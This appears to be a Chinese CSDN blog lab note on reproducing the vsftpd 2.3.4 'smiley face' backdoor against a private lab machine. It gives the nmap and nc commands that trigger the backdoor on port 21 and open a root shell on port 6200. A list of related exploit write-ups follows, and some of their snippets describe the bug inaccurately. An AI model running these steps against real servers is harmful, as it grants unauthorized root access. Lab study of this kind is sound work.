笑脸漏洞复现

最新推荐文章于 2023-03-23 14:10:01 发布
最新推荐文章于 2023-03-23 14:10:01 发布
阅读量314 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62270288/article/details/127490338
版权

漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。

靶机ip:192.168.10.131

kali攻击机ip:192.168.10.129

实验过程:

1.kali 使用nmap扫描同网段靶机。

nmap 192.168.10.129/24

 

 

 

发现靶机开放了21端口(ftp服务)

2.nmap -sV 192.168.10.131检查ftp服务的版本

 确定为vsftpd2.3.4

3.用瑞士军刀(nc)连接靶机21端口,user带有:),pass随意

nc 192.168.10.131 21

4.然后检查靶机的6200端口状态

nmap -p 6200 192.168.10.131

发现6200开放

5.打开新的终端窗口,连接靶机6200端口

nc 192.168.10.131 6200 

 

 以root身份进入,实验成功

koo364
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络渗透测试作业:笑脸漏洞复现
m0_62826547的博客
12-13 3034
笑脸漏洞复现 工具: 攻击机:kali 192.168.79.128 靶机:Metasplotable2-Linux 192.168.79.131 复现过程 打开 kali 终端,执行以下命令:nmap 主机IP/24 发现靶机 (192.168.118.131) 打开着 21 端口 输入命令:nmap -sV 靶机IP 可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,存在漏洞 输入命令:ftp 192.168.79.131 21 用户名: roo...
Linux(kali)笑脸漏洞实验
Selma003的博客
04-11 2191
笑脸漏洞实战感受
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
Button12138的博客
01-31 1082
VMware Tools本地提权漏洞CVE-2022-31676分析与复现
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6598
Weblogic CVE-2023-21839漏洞复现
漏洞复现- - -IIS解析漏洞在fckEditor上传攻击中的利用
weixin_67503304的博客
10-26 2203
本文主要讲解了IIS解析漏洞在fckEditor上传攻击中的利用方式及其详细步骤。
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 862
在vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
vsftpd2.3.4著名笑脸漏洞复现实战
qq_55961856的博客
06-01 1280
1.vsftpd手工利用 攻击机kali:192.168.182.133 靶机metasploit:192.168.182.128 先ping一下靶机看看靶机是否存活 接着使用nmap对靶机进行信息收集 这里可以看到版本是vsftpd2.3.4 漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随意即可 这时靶机会开启6200端口 记下来nc或者telnet连接就可以了 最后直接可以获取到root权限了 2.MSF利用 打开终端输入msfconsole 这里也是简单的几步命令就能获得r
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 3047
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
vsftpd 2.3.4 带漏洞版本 可复现
09-26
然而,每个软件都有可能存在安全隐患,而vsftpd 2.3.4版本就是一个典型的例子,它携带了一个名为“笑脸漏洞”(Smiling Goat Vulnerability)的安全问题。这个漏洞允许未经身份验证的远程攻击者执行任意代码,从而对...
Windows域提权漏洞CVE-2021-442287
qq_53579360的博客
11-25 911
Windows域提权漏洞CVE-2021-442287
漏洞复现-druid-任意文件读取】vulfocus/druid-cve_2021_36749
10-16 1054
【druid-任意文件读取】功能点
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 745
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
Redis未授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9590
redis未授权访问漏洞
禅道项目管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 1万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4107
CVE-2023-21839漏洞复现
【vulhub漏洞复现】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3825
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2766
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
文件上传漏洞
newlife1441的博客
08-14 1585
trim()作用:从一个字符串的两端删除空白字符deldot()作用:从字符串的尾部开始,从后向前删除点.,直到该字符串的末尾字符不是.为止strrchr()作用:查找字符串在另一个字符串中最后一次出现strtolower()作用:转换大小写str_ireplace()作用:字符串替换操作,不区分大小写。......
CVE-2020-17518漏洞复现
m0_48736242的博客
10-01 1528
记录第一次漏洞复现,cve-2020-17518文件上传漏洞
metasploitable笑脸漏洞
最新发布
07-25
回答: metasploitable2中的笑脸漏洞是指vsftpd2.3.4版本中的一个后门漏洞。该漏洞允许攻击者通过使用弱口令(例如23弱口令)来获取对目标系统的访问权限。\[2\]如果攻击者成功利用该漏洞,他们可以执行远程命令或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值